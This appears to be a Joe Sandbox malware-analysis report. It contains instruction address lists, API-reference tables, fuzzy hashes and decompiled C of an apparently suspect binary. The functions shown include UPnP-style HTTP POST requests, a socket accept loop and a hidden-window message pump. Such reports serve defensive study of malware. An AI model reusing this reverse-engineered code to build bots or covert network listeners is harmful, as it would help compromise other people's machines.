                                                                                                                                                                                                                                                                  0x0040e1d0
                                                                                                                                                                                                                                                                  0x0040e1d5
                                                                                                                                                                                                                                                                  0x0040e1df
                                                                                                                                                                                                                                                                  0x0040e1eb
                                                                                                                                                                                                                                                                  0x0040e1eb
                                                                                                                                                                                                                                                                  0x0040e1df
                                                                                                                                                                                                                                                                  0x0040e1c2
                                                                                                                                                                                                                                                                  0x0040e1b1
                                                                                                                                                                                                                                                                  0x0040e181
                                                                                                                                                                                                                                                                  0x0040e1f6
                                                                                                                                                                                                                                                                  0x0040e1f8
                                                                                                                                                                                                                                                                  0x0040e203
                                                                                                                                                                                                                                                                  0x0040e24c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e252
                                                                                                                                                                                                                                                                  0x0040e258
                                                                                                                                                                                                                                                                  0x0040e25d
                                                                                                                                                                                                                                                                  0x0040e2a1
                                                                                                                                                                                                                                                                  0x0040e2a5
                                                                                                                                                                                                                                                                  0x0040e2b1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e25f
                                                                                                                                                                                                                                                                  0x0040e25f
                                                                                                                                                                                                                                                                  0x0040e265
                                                                                                                                                                                                                                                                  0x0040e277
                                                                                                                                                                                                                                                                  0x0040e279
                                                                                                                                                                                                                                                                  0x0040e282
                                                                                                                                                                                                                                                                  0x0040e285
                                                                                                                                                                                                                                                                  0x0040e28a
                                                                                                                                                                                                                                                                  0x0040e28d
                                                                                                                                                                                                                                                                  0x0040e28d
                                                                                                                                                                                                                                                                  0x0040e282
                                                                                                                                                                                                                                                                  0x0040e297
                                                                                                                                                                                                                                                                  0x0040e29d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e25f
                                                                                                                                                                                                                                                                  0x0040e205
                                                                                                                                                                                                                                                                  0x0040e209
                                                                                                                                                                                                                                                                  0x0040e20f
                                                                                                                                                                                                                                                                  0x0040e214
                                                                                                                                                                                                                                                                  0x0040e23a
                                                                                                                                                                                                                                                                  0x0040e23b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e23b
                                                                                                                                                                                                                                                                  0x0040e216
                                                                                                                                                                                                                                                                  0x0040e21f
                                                                                                                                                                                                                                                                  0x0040e227
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e229
                                                                                                                                                                                                                                                                  0x0040e22a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e22a
                                                                                                                                                                                                                                                                  0x0040e227
                                                                                                                                                                                                                                                                  0x0040e235
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e2b5
                                                                                                                                                                                                                                                                  0x0040e2bb
                                                                                                                                                                                                                                                                  0x0040e2c1
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040E12C
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E13F
                                                                                                                                                                                                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040E159
                                                                                                                                                                                                                                                                  • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0040E176
                                                                                                                                                                                                                                                                  • accept.WS2_32(?,?,?), ref: 0040E1A8
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040E1F6
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E209
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E22A
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E23B
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040E243
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E252
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E265
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E2A5
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040E2AB
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E2BB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                                                                                                  • String ID: PCOI$ilci
                                                                                                                                                                                                                                                                  • API String ID: 3345448188-3762367603
                                                                                                                                                                                                                                                                  • Opcode ID: 7455252e4ff479be94a49cbb1942bce9dbcd425f8730585712822cac2a609895
                                                                                                                                                                                                                                                                  • Instruction ID: fd6fa502bc2c0ef985739ca9974dfc73087b23499b60ed651c204545790cd000
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7455252e4ff479be94a49cbb1942bce9dbcd425f8730585712822cac2a609895
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB41DF715002109BCB20DF75DD88B5B77A8AB48720F044E7EF955BB2C2DB38E859CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                                                                                  			E0040CA80(char* _a4, char* _a8, void* _a12, long* _a16) {
                                                                                                                                                                                                                                                                  				char _v260;
                                                                                                                                                                                                                                                                  				char _v772;
                                                                                                                                                                                                                                                                  				char* _v776;
                                                                                                                                                                                                                                                                  				void* _v780;
                                                                                                                                                                                                                                                                  				intOrPtr _v792;
                                                                                                                                                                                                                                                                  				char* _v796;
                                                                                                                                                                                                                                                                  				signed short _v816;
                                                                                                                                                                                                                                                                  				intOrPtr _v820;
                                                                                                                                                                                                                                                                  				char* _v824;
                                                                                                                                                                                                                                                                  				void _v836;
                                                                                                                                                                                                                                                                  				void* _v840;
                                                                                                                                                                                                                                                                  				void* _v844;
                                                                                                                                                                                                                                                                  				void* _v848;
                                                                                                                                                                                                                                                                  				char* _v852;
                                                                                                                                                                                                                                                                  				long _v856;
                                                                                                                                                                                                                                                                  				void _v1884;
                                                                                                                                                                                                                                                                  				long _v1888;
                                                                                                                                                                                                                                                                  				void* _t102;
                                                                                                                                                                                                                                                                  				void* _t103;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v776 = 0;
                                                                                                                                                                                                                                                                  				_v840 = 0;
                                                                                                                                                                                                                                                                  				memset( &_v836, 0, 0x38);
                                                                                                                                                                                                                                                                  				_t103 = _t102 + 0xc;
                                                                                                                                                                                                                                                                  				_v840 = 0x3c;
                                                                                                                                                                                                                                                                  				_v824 =  &_v260;
                                                                                                                                                                                                                                                                  				_v820 = 0x100;
                                                                                                                                                                                                                                                                  				_v796 =  &_v772;
                                                                                                                                                                                                                                                                  				_v792 = 0x200;
                                                                                                                                                                                                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                                                                                                                                                                                                  				_v780 = InternetOpenA("Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", 1, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v780 != 0) {
                                                                                                                                                                                                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v844 != 0) {
                                                                                                                                                                                                                                                                  						_v848 = HttpOpenRequestA(_v844, "POST",  &_v772, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v848 != 0) {
                                                                                                                                                                                                                                                                  							HttpAddRequestHeadersA(_v848, _a8, 0xffffffff, 0xa0000000);
                                                                                                                                                                                                                                                                  							_v852 = "Content-Type: text/xml; charset=\"utf-8\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n";
                                                                                                                                                                                                                                                                  							if(HttpSendRequestA(_v848, _v852, 0xffffffff, _a12,  *_a16) != 0) {
                                                                                                                                                                                                                                                                  								_v856 = 0;
                                                                                                                                                                                                                                                                  								while(1 != 0) {
                                                                                                                                                                                                                                                                  									_t98 = _v848;
                                                                                                                                                                                                                                                                  									if(InternetReadFile(_v848,  &_v1884, 0x400,  &_v1888) != 0 && _v1888 != 0) {
                                                                                                                                                                                                                                                                  										_v776 = E00408880(_v776, _t98, _v776, _v856 + _v1888);
                                                                                                                                                                                                                                                                  										memcpy( &(_v776[_v856]),  &_v1884, _v1888);
                                                                                                                                                                                                                                                                  										_t103 = _t103 + 0x14;
                                                                                                                                                                                                                                                                  										_v856 = _v856 + _v1888;
                                                                                                                                                                                                                                                                  										continue;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								 *_a16 = _v856;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							InternetCloseHandle(_v848);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						InternetCloseHandle(_v844);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v780);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v776;
                                                                                                                                                                                                                                                                  			}






















                                                                                                                                                                                                                                                                  0x0040ca89
                                                                                                                                                                                                                                                                  0x0040ca93
                                                                                                                                                                                                                                                                  0x0040caa8
                                                                                                                                                                                                                                                                  0x0040caad
                                                                                                                                                                                                                                                                  0x0040cab0
                                                                                                                                                                                                                                                                  0x0040cac0
                                                                                                                                                                                                                                                                  0x0040cac6
                                                                                                                                                                                                                                                                  0x0040cad6
                                                                                                                                                                                                                                                                  0x0040cadc
                                                                                                                                                                                                                                                                  0x0040caf8
                                                                                                                                                                                                                                                                  0x0040cb11
                                                                                                                                                                                                                                                                  0x0040cb1e
                                                                                                                                                                                                                                                                  0x0040cb4a
                                                                                                                                                                                                                                                                  0x0040cb57
                                                                                                                                                                                                                                                                  0x0040cb80
                                                                                                                                                                                                                                                                  0x0040cb8d
                                                                                                                                                                                                                                                                  0x0040cba5
                                                                                                                                                                                                                                                                  0x0040cbab
                                                                                                                                                                                                                                                                  0x0040cbd7
                                                                                                                                                                                                                                                                  0x0040cbdd
                                                                                                                                                                                                                                                                  0x0040cbe7
                                                                                                                                                                                                                                                                  0x0040cc07
                                                                                                                                                                                                                                                                  0x0040cc16
                                                                                                                                                                                                                                                                  0x0040cc3f
                                                                                                                                                                                                                                                                  0x0040cc60
                                                                                                                                                                                                                                                                  0x0040cc65
                                                                                                                                                                                                                                                                  0x0040cc74
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cc74
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cc16
                                                                                                                                                                                                                                                                  0x0040cc88
                                                                                                                                                                                                                                                                  0x0040cc88
                                                                                                                                                                                                                                                                  0x0040cc91
                                                                                                                                                                                                                                                                  0x0040cc91
                                                                                                                                                                                                                                                                  0x0040cc9e
                                                                                                                                                                                                                                                                  0x0040cc9e
                                                                                                                                                                                                                                                                  0x0040ccab
                                                                                                                                                                                                                                                                  0x0040ccab
                                                                                                                                                                                                                                                                  0x0040ccba

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.NTDLL ref: 0040CAA8
                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040CAF8
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040CB0B
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040CB44
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CB7A
                                                                                                                                                                                                                                                                  • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040CBA5
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,0040F8D0,000000FF,00009E34), ref: 0040CBCF
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040CC0E
                                                                                                                                                                                                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040CC60
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CC91
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CC9E
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CCAB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                                                                                                  • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                                                                                                  • API String ID: 2761394606-2217117414
                                                                                                                                                                                                                                                                  • Opcode ID: 3fdeff464afb622b62c72841783980a28ec6984a3ef83e7d60f11a73aafb7751
                                                                                                                                                                                                                                                                  • Instruction ID: c856054e2ea53d444f21cfc80edf77a11ba1f019c23f833370997c74f21767c5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fdeff464afb622b62c72841783980a28ec6984a3ef83e7d60f11a73aafb7751
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF512BB59012289BDB36CF54CD94BDA73BCAB48705F1441E9B60DBA280D778AF88CF54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                                                                                                                  			E0040DE00(intOrPtr* __edi) {
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				void* _t25;
                                                                                                                                                                                                                                                                  				long _t40;
                                                                                                                                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                                                                                                                                  				intOrPtr* _t55;
                                                                                                                                                                                                                                                                  				void* _t56;
                                                                                                                                                                                                                                                                  				LONG* _t62;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t53 = __edi;
                                                                                                                                                                                                                                                                  				if(__edi == 0 ||  *__edi != 0x494f4350) {
                                                                                                                                                                                                                                                                  					return _t25;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t1 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                  					EnterCriticalSection(_t1);
                                                                                                                                                                                                                                                                  					_t55 =  *((intOrPtr*)(__edi + 0x38));
                                                                                                                                                                                                                                                                  					if(_t55 == 0) {
                                                                                                                                                                                                                                                                  						L11:
                                                                                                                                                                                                                                                                  						_t13 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                  						LeaveCriticalSection(_t13);
                                                                                                                                                                                                                                                                  						SetEvent( *(_t53 + 0x10));
                                                                                                                                                                                                                                                                  						_t56 = 0;
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t53 + 4)) <= 0) {
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							E0040B9B0( *((intOrPtr*)(_t53 + 0xc)), 0xffffffff);
                                                                                                                                                                                                                                                                  							E0040BAF0( *((intOrPtr*)(_t53 + 0xc)));
                                                                                                                                                                                                                                                                  							CloseHandle( *(_t53 + 8));
                                                                                                                                                                                                                                                                  							CloseHandle( *(_t53 + 0x10));
                                                                                                                                                                                                                                                                  							__imp__WSACloseEvent( *((intOrPtr*)(_t53 + 0x18)));
                                                                                                                                                                                                                                                                  							E00409320( *((intOrPtr*)(_t53 + 0x14)));
                                                                                                                                                                                                                                                                  							_t24 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                  							DeleteCriticalSection(_t24);
                                                                                                                                                                                                                                                                  							return E00408990(_t53);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							PostQueuedCompletionStatus( *(_t53 + 8), 0, 0, 0);
                                                                                                                                                                                                                                                                  							_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                  						} while (_t56 <  *((intOrPtr*)(_t53 + 4)));
                                                                                                                                                                                                                                                                  						goto L14;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						goto L3;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						L3:
                                                                                                                                                                                                                                                                  						if( *_t55 == 0x69636c69) {
                                                                                                                                                                                                                                                                  							if( *((char*)(_t55 + 0x275)) == 0) {
                                                                                                                                                                                                                                                                  								_t62 = _t55 + 0x21c;
                                                                                                                                                                                                                                                                  								_t40 = InterlockedExchangeAdd(_t62, 0);
                                                                                                                                                                                                                                                                  								if(_t40 == 0) {
                                                                                                                                                                                                                                                                  									 *(_t55 + 0x230) = _t40;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t55 + 0x220)) = 1;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t55 + 0x228)) = _t55 + 8;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t55 + 0x22c)) = 0x200;
                                                                                                                                                                                                                                                                  									InterlockedIncrement(_t62);
                                                                                                                                                                                                                                                                  									if(E0040E450(_t55) == 0) {
                                                                                                                                                                                                                                                                  										InterlockedDecrement(_t62);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t55 =  *((intOrPtr*)(_t55 + 0x280));
                                                                                                                                                                                                                                                                  					} while (_t55 != 0);
                                                                                                                                                                                                                                                                  					goto L11;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x0040de00
                                                                                                                                                                                                                                                                  0x0040de02
                                                                                                                                                                                                                                                                  0x0040df37
                                                                                                                                                                                                                                                                  0x0040de14
                                                                                                                                                                                                                                                                  0x0040de16
                                                                                                                                                                                                                                                                  0x0040de1a
                                                                                                                                                                                                                                                                  0x0040de20
                                                                                                                                                                                                                                                                  0x0040de25
                                                                                                                                                                                                                                                                  0x0040deb0
                                                                                                                                                                                                                                                                  0x0040deb0
                                                                                                                                                                                                                                                                  0x0040deb4
                                                                                                                                                                                                                                                                  0x0040debe
                                                                                                                                                                                                                                                                  0x0040dec4
                                                                                                                                                                                                                                                                  0x0040dec9
                                                                                                                                                                                                                                                                  0x0040dee3
                                                                                                                                                                                                                                                                  0x0040dee9
                                                                                                                                                                                                                                                                  0x0040def2
                                                                                                                                                                                                                                                                  0x0040df04
                                                                                                                                                                                                                                                                  0x0040df0a
                                                                                                                                                                                                                                                                  0x0040df10
                                                                                                                                                                                                                                                                  0x0040df1a
                                                                                                                                                                                                                                                                  0x0040df22
                                                                                                                                                                                                                                                                  0x0040df26
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040df36
                                                                                                                                                                                                                                                                  0x0040ded1
                                                                                                                                                                                                                                                                  0x0040dedb
                                                                                                                                                                                                                                                                  0x0040dedd
                                                                                                                                                                                                                                                                  0x0040dede
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040de2b
                                                                                                                                                                                                                                                                  0x0040de2b
                                                                                                                                                                                                                                                                  0x0040de31
                                                                                                                                                                                                                                                                  0x0040de53
                                                                                                                                                                                                                                                                  0x0040de57
                                                                                                                                                                                                                                                                  0x0040de5e
                                                                                                                                                                                                                                                                  0x0040de66
                                                                                                                                                                                                                                                                  0x0040de6c
                                                                                                                                                                                                                                                                  0x0040de72
                                                                                                                                                                                                                                                                  0x0040de7c
                                                                                                                                                                                                                                                                  0x0040de82
                                                                                                                                                                                                                                                                  0x0040de8c
                                                                                                                                                                                                                                                                  0x0040de99
                                                                                                                                                                                                                                                                  0x0040de9c
                                                                                                                                                                                                                                                                  0x0040de9c
                                                                                                                                                                                                                                                                  0x0040de99
                                                                                                                                                                                                                                                                  0x0040de66
                                                                                                                                                                                                                                                                  0x0040de53
                                                                                                                                                                                                                                                                  0x0040dea2
                                                                                                                                                                                                                                                                  0x0040dea8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040de2b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000020,0040B670,?,0040E9A4), ref: 0040DE1A
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040DE46
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DE5E
                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0040DE8C
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040DE9C
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000020,?,0040E9A4), ref: 0040DEB4
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,0040E9A4), ref: 0040DEBE
                                                                                                                                                                                                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,0040E9A4), ref: 0040DEDB
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,0040E9A4), ref: 0040DF04
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,0040E9A4), ref: 0040DF0A
                                                                                                                                                                                                                                                                  • WSACloseEvent.WS2_32(?), ref: 0040DF10
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(00000020,?,?,?,0040E9A4), ref: 0040DF26
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                                                                                                  • String ID: PCOI$ilci
                                                                                                                                                                                                                                                                  • API String ID: 2403999931-3762367603
                                                                                                                                                                                                                                                                  • Opcode ID: 89350a157d29e29f4a1b1d797befc67f64273c81bb48e2ba99e5f8922f900f69
                                                                                                                                                                                                                                                                  • Instruction ID: 73f0472627ba8a888b827b8634c70e373476b8db8a351e124d448d94f7e1e702
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89350a157d29e29f4a1b1d797befc67f64273c81bb48e2ba99e5f8922f900f69
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 663185B1900B05ABD720EFB5D948B57B7A8BF18710F048539E55AB7681C738F858CBD8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                                                                                                                  			E00404120() {
                                                                                                                                                                                                                                                                  				struct HWND__* _v8;
                                                                                                                                                                                                                                                                  				struct tagMSG _v36;
                                                                                                                                                                                                                                                                  				struct _WNDCLASSEXW _v84;
                                                                                                                                                                                                                                                                  				short _v596;
                                                                                                                                                                                                                                                                  				unsigned int _t20;
                                                                                                                                                                                                                                                                  				void* _t39;
                                                                                                                                                                                                                                                                  				void* _t40;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					_v84.cbSize = 0;
                                                                                                                                                                                                                                                                  					memset( &(_v84.style), 0, 0x2c);
                                                                                                                                                                                                                                                                  					_t40 = _t39 + 0xc;
                                                                                                                                                                                                                                                                  					_v84.cbSize = 0x30;
                                                                                                                                                                                                                                                                  					_v84.lpfnWndProc = E00403ED0;
                                                                                                                                                                                                                                                                  					_v84.hInstance = GetModuleHandleW(0);
                                                                                                                                                                                                                                                                  					_v84.lpszClassName =  &_v596;
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						Sleep(1);
                                                                                                                                                                                                                                                                  						_t20 = GetTickCount();
                                                                                                                                                                                                                                                                  						wsprintfW( &_v596, L"%x%X", GetTickCount(), _t20 >> 1);
                                                                                                                                                                                                                                                                  						_t40 = _t40 + 0x10;
                                                                                                                                                                                                                                                                  					} while ((RegisterClassExW( &_v84) & 0x0000ffff) == 0);
                                                                                                                                                                                                                                                                  					_v8 = CreateWindowExW(0, _v84.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v84.hInstance, 0);
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						while(GetMessageA( &_v36, 0, 0, 0) > 0) {
                                                                                                                                                                                                                                                                  							TranslateMessage( &_v36);
                                                                                                                                                                                                                                                                  							DispatchMessageA( &_v36);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L7;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					break;
                                                                                                                                                                                                                                                                  					L7:
                                                                                                                                                                                                                                                                  				} while (0 != 0);
                                                                                                                                                                                                                                                                  				ExitThread(0);
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x00404129
                                                                                                                                                                                                                                                                  0x00404129
                                                                                                                                                                                                                                                                  0x00404138
                                                                                                                                                                                                                                                                  0x0040413d
                                                                                                                                                                                                                                                                  0x00404140
                                                                                                                                                                                                                                                                  0x00404147
                                                                                                                                                                                                                                                                  0x00404156
                                                                                                                                                                                                                                                                  0x0040415f
                                                                                                                                                                                                                                                                  0x00404162
                                                                                                                                                                                                                                                                  0x00404164
                                                                                                                                                                                                                                                                  0x0040416a
                                                                                                                                                                                                                                                                  0x00404186
                                                                                                                                                                                                                                                                  0x0040418c
                                                                                                                                                                                                                                                                  0x0040419c
                                                                                                                                                                                                                                                                  0x004041c2
                                                                                                                                                                                                                                                                  0x004041c9
                                                                                                                                                                                                                                                                  0x004041cd
                                                                                                                                                                                                                                                                  0x004041e5
                                                                                                                                                                                                                                                                  0x004041ef
                                                                                                                                                                                                                                                                  0x004041ef
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004041cd
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004041f7
                                                                                                                                                                                                                                                                  0x004041f7
                                                                                                                                                                                                                                                                  0x00404201

                                                                                                                                                                                                                                                                  APIs
